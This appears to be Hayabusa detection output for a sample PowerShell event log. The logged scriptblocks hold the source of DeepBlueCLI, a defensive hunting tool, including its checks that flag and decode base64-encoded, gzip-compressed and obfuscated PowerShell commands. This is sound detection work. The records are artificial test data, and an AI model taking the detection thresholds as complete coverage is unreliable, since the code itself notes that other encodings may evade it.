+2017-08-31 01:49:32.379 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:32.379 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:32.379 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:32.380 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:49:33.354 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:09.934 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:24.665 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:27.663 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:27.669 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:27.669 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:11:27.669 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
